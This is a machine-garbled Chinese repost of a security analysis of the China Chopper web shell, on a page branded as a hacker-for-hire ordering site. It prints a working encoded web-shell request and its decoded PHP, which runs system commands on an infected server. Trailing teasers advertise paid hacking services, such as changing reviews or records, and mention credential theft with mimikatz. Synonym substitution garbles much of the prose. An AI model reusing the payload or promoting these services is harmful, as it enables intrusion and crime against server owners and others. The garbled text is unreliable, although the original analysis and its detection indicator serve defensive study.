九年后“中国菜刀”依然锋利:China Chopper三起攻击案例分析-黑客接单平台

访客5年前黑客文章1300
曩昔发现的要挟常常会跟着时刻的推移而逐步退出于公众视界中,但China Chopper却坚持了持久的生命力。 在曩昔两年的时刻里,思科Talos团队观察到China Chopper很多活动的踪影,有数个要挟安排将China Chopper融入到其举动中,这表明,即便距China Chopper初次发现现已过了九年,对部分要挟行为者而言它却仍然能起到要害的效果。本文将挑选其间最活泼的三次举动来剖析。 China Chopper是一种web shell,能让进犯者经过包含操控方针所需一切逻辑的客户端应用程序保存对受感染体系的拜访权限。 China Chopper是广泛可用的,简直任何人都可以运用它。这也意味着,仅以China Chopper的存在作为方针,简直不或许将进犯归咎于某个特定集体。 China Chopper的“返老还童”也直接说明晰许多看似老旧要挟永久不会真实消失,互联网的防御者们不应当只把目光放到一些新的歹意软件上。 什么是China Chopper? China Chopper是一类东西,答应进犯者长途操控方针体系,条件是体系需求运转web服务器应用程序。Web shell可以在不同的渠道上运转,但在本例中,咱们只重视受感染的Windows主机。China Chopper已被证明由一些国家支撑的要挟集体,如Leviathan、Threat Group-3390等在运用。 在研讨中咱们发现,Internet Information Services (IIS)和Apache web服务器都受到过China Chopper web shell的进犯。咱们没有关于web shell是怎么装置的信息,可是考虑到有一些web应用程序结构,比方老版别的Oracle WebLogic或WordPress,它们傍边包含的长途代码履行缝隙或许使自己成了进犯方针。 China Chopper为进犯者供给了一个简略的GUI,答应他们装备到服务器的链接,并生成服务器端代码,这些代码有必要添加到方针网站的代码后才干进行通讯。 图1.China Chopper GUI 服务器端代码十分简略,只包含一行代码,依据应用程序渠道的不同有所改动。后门支撑.NET Active Server Pages或PHP。 以下是受感染的PHP应用程序的服务器端代码示例: 咱们并不能确认,服务器代码的如此简略是否是China Chopper开发人员为了添加检测的难度而故意为之,可是在短代码片段上运用形式匹配或许会发生一些误报。 China Chopper客户端运用HTTP POST恳求与受感染的服务器通讯。服务器端代码的仅有功用是评价在客户端GUI中装备服务器代码期间指定的恳求参数。在咱们的示例中,预期的参数名称是“test”。经过HTTP的通讯,可以很简单在捕获 *** 数据包后发现。 China Chopper包含一个长途shell(虚拟终端)功用,它首要会主张运用指令 'netstat an|find "ESTABLISHED."',在受感染体系上的进程创立日志中很或许会看到此指令。 图2.China Chopper首要主张的终端指令 当咱们剖析捕获的数据包时,可以看到参数“test”包含另一个eval句子。 依据该指令,客户端将提交必定数量的参数,z0一直到zn。在提交之前,一切参数都运用规范base64编码器进行编码。参数z0一直包含解析其他参数、发动恳求的指令并将成果回来给客户机的代码。 带参数的编码China Chopper POST恳求: test=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHhhbXBwXGh0ZG9jc1xkYXNoYm9hcmRcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D 在此恳求中,解码的参数是: z0 - @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?" ret={$ret} ":"";;echo("| 指令的结尾“&echo [S]&cd&echo [E]”好像出现在一切虚拟终端恳求中,可以作为一个牢靠的指示器来检测数据包捕获或行为日志中的China Chopper活动。 除了终端,China Chopper还包含一个文件管理器(可以创立目录、下载文件和更改文件元数据)、一个数据库管理器和一个根本的缝隙扫描器。 下面是咱们对三次举动的论说,它们别离有不同的方针、东西、技能及(或许不同的)要挟团伙。 图3.观察到的事例研讨的时刻表 事例研讨1:针对亚洲 *** 安排的特务举动 咱们在几回特务活动中确认了China Chopper的运用情况,其间一次针对亚洲 *** 安排的举动中,China Chopper被用于内部 *** ,装置在了一些用于存储秘要文档的Web服务器[1][2][3]黑客接单网

相关文章

解压缩密码破解,黑客入侵联系,淘宝找黑客改评价

这便是咱们常常说的邮件欺诈,假造邮件的标题使得从别处宣布的邮件看上去像是真的。 一般情况下,黑客假造邮件地址需求:[1][2]黑客接单渠道前语在本次实验中,请留意实验东西、实验文件寄存途径,不同的文件...

百度竞价歹意点击实战心得

 这将是一篇很有含义的文章,能够让你对百度凤巢体系有更深一步知道。 仔细看下去,收成必将不少。 百度推广凤巢体系同一ip屡次点击会算为一次费用吗? 百度推广同行歹意点击体系会过滤掉吗? 咱们将从以下几...

黑客接单70614667_网上找黑客被骗

摘要:2018年GandCrab、GlobeImposter、CrySis这三大宗族勒索病毒的受害者最多,算计占比高达80.2%。 一个 chunk 结构里界说了 chunk 的类型、开端方位、完毕方...

怎么戒掉网络赌博

@cfreal的文章中已经说了,我这里在多说句,相关代码可以看看1和2还有SAFE_ACCPET的宏定义: 5、 安天智甲终端防御系统与安天资产安全运维系统组合使用,可以充分减少暴露面,形成威胁防御响...

163邮箱登录入口,找靠谱黑客,看门狗任务找黑客

有这样的一个运用(自己写的一个, 后边会附上代码),你手动去注入的时分,发现是有注入点的 1. 修正DHCP服务的DNS,参数dnsserver和dnsserver2:<imgsrc=http:...

能接单的黑客q,现实黑客在哪里找,想改婚姻状况找黑客

15、VBulletin论坛的数据库0x020102 射频芯片操控指令解析  定论fun.ps1 powershell脚本将会在方针体系的内存中履行mimikatz,而且它会经过POST恳求将用户凭据...